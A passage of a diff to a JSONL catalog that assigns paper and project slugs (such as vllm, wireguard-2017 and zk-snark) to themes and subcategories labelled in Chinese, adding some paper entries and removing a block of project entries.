+{"slug":"unicron","area":"papers","theme":"基础设施","themeId":"infrastructure","subcategory":"LLM系统","source":"candidates.topic+category","confidence":"high","rawCategory":"基础设施"} {"slug":"unified-memory-2014","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"univtg-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"unix-1974","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"unlocking-the-working-memory-of-large-language-models-for-latent-reasoning-arxiv","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"uvtg-mllm-2025","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"v-system-1988","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"vall-e-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} @@ -883,13 +1200,22 @@ {"slug":"veach-1997-mlt","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"vega-lite","area":"papers","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"category","confidence":"high","rawCategory":"数据可视化"} {"slug":"vellvm","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"velox-meta-2022","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"verdi-2015","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} +{"slug":"vericache","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"verifier-free-rl-2026","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"verisoft-2008","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"vertica-2012","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} +{"slug":"verus-specgym","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} +{"slug":"vescale-fsdp-2026","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"via-sd","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"推理加速","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} +{"slug":"vibeserve","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"vid-llm-survey-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"video-chatgpt-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"video-llama-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"video-llava-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"video-mdm","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"动作生成","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} +{"slug":"video-of-thought","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频推理","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"videoagent-longform-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"videoagent-memory-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"videochat-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} @@ -897,13 +1223,16 @@ {"slug":"videollama2-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"videollama3-2025","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"videollm-online-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"videomla","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"videomme-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"videoprism-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"vidstg-2020","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"vinoground-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"visualthink-vla","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"vit","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"计算机视觉","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"vl2-2009","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"vllm","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"vmware-ft-scales-2010","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"vogels-eventual-2009","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"volcano-1994","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"volcano","area":"papers","theme":"数据库","themeId":"databases","subcategory":"数据库","source":"category","confidence":"high","rawCategory":"数据库"} @@ -922,6 +1251,10 @@ {"slug":"wandb","area":"papers","theme":"基础设施","themeId":"infrastructure","subcategory":"基础设施","source":"category","confidence":"high","rawCategory":"基础设施"} {"slug":"wang-2014-spdy","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"ward-1992","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"wco-joins-relational-2020","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} +{"slug":"weavebench","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"评测基准","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} +{"slug":"weaver","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"机器人","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} +{"slug":"webauthn-fido2","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"websocket-rfc-6455","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"category","confidence":"high","rawCategory":"网络协议"} {"slug":"webxskill","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体与 LLM","source":"candidates.topic","confidence":"high","rawCategory":"Agent"} {"slug":"whisper-2022","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} @@ -929,7 +1262,9 @@ {"slug":"why3-2013","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"wide-deep-2016","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"williams-1983-mipmap","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"wilson-1992-gc-survey","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"wireguard-2017","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} +{"slug":"wisckey","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"word2vec","area":"papers","theme":"NLP","themeId":"nlp","subcategory":"NLP","source":"category","confidence":"high","rawCategory":"NLP"} {"slug":"world-model-robot-learning-2026","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"机器人与 VLA","source":"slugOverrides","confidence":"high","rawCategory":"机器学习"} {"slug":"worldsense-2025","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} @@ -938,873 +1273,22 @@ {"slug":"xlnet-2019","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"xtrace-2007","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"yao-garbled-circuits-1986","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"yarn-rope-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"yjs-crdt-overview","area":"papers","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} +{"slug":"yocto-alternatives","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"youtube-dl-riaa-dmca-2020","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"youtube-two-tower-2019","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"z3-2008","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"zab-2011","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} +{"slug":"zaya1-8b","area":"papers","theme":"其他","themeId":"other","subcategory":"llm","source":"candidates.topic+category","confidence":"high","rawCategory":"其他"} +{"slug":"zed-editor-collaborative","area":"papers","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} +{"slug":"zephyr-rtos-overview","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式与 IoT","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"zero-2020","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"zfs-2003","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"zfs-bonwick-2003","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"zgc","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言","source":"category","confidence":"high","rawCategory":"编程语言"} +{"slug":"zigbee-vs-matter-thread-2026","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式与 IoT","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"zk-snark-pinocchio-2013","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"zk-snark","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"密码学","source":"category","confidence":"high","rawCategory":"安全与隐私"} {"slug":"zombie-agents-2602","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体与 LLM","source":"candidates.topic","confidence":"high","rawCategory":"Agent"} -{"slug":"3d-force-graph","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"aave-v3","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"accelerate","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"act","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"actions-runner-controller","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps / CI 基建","source":"category","confidence":"high","rawCategory":"基础设施"} -{"slug":"actix-web","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"affine","area":"projects","theme":"CLI","themeId":"cli","subcategory":"开源工具","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"ag-grid","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"age","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"aichat","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"aiortc","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"airflow","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"altair","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"amcharts5","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"anchor","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"anime","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"ann-benchmarks","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"数据检索 / 基础设施","source":"category","confidence":"high","rawCategory":"基础设施"} -{"slug":"annoy","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"ansible","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"ant-media-server","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"anthropic-cookbook","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"AI","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"antv-f2","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"antv-g2","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"antv-g6","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"antv-x6","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"ape-framework","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"apexcharts","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"apollo-server","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"appwrite","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"aptos-core","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"aragon","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"arangodb","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"arbitrum","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"ardour","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"arduino-cli","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"argent-x","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"argilla","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"argo-workflows","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"argocd","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"arktype","area":"projects","theme":"CLI","themeId":"cli","subcategory":"工具库","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"arrow-rs","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"arrow","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"arweave","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"asdf","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"aspnetcore","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"ast-grep","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"asterisk","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"astro","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"UI 框架 / 静态站点","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"astronvim","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"asynq","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"atom","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"aubio","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"audacity","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"auth-js","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"autogen","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"autogluon","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"automerge","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"aws-spot-best-practices","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"基础设施","source":"category","confidence":"high","rawCategory":"基础设施"} -{"slug":"axelar","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"axios","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"axolotl","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"axum","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"babylonjs","area":"projects","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} -{"slug":"backstage","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"badger","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"balancer","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"bandwhich","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"bat","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"bbolt","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"bentoml","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"besu","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"better-auth","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"框架与 SDK","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"bevy","area":"projects","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} -{"slug":"bigbluebutton","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"billboard-js","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"biome","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端工具链","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"bitcoin-core","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"bokeh","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"botbuilder-js","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"botpress","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"bottom","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"boxen","area":"projects","theme":"CLI","themeId":"cli","subcategory":"工具库","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"broot","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"browser-use","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"AI agent infra","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"btop","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"bubbletea","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"buildah","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"buildkit","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"buildroot","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"bullmq","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"bun","area":"projects","theme":"编译器","themeId":"compilers","subcategory":"语言运行时","source":"candidates.topic","confidence":"high","rawCategory":"编译器"} -{"slug":"caddy","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"cairo-lang","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"cal-com","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"SaaS 应用","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"calico","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"candle","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"canvas-datagrid","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"capacitor","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"移动端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"capnproto","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"captum","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"cassandra","area":"projects","theme":"分布式系统","themeId":"distributed-systems","subcategory":"数据库 / 分布式","source":"category","confidence":"high","rawCategory":"分布式系统"} -{"slug":"celery","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} 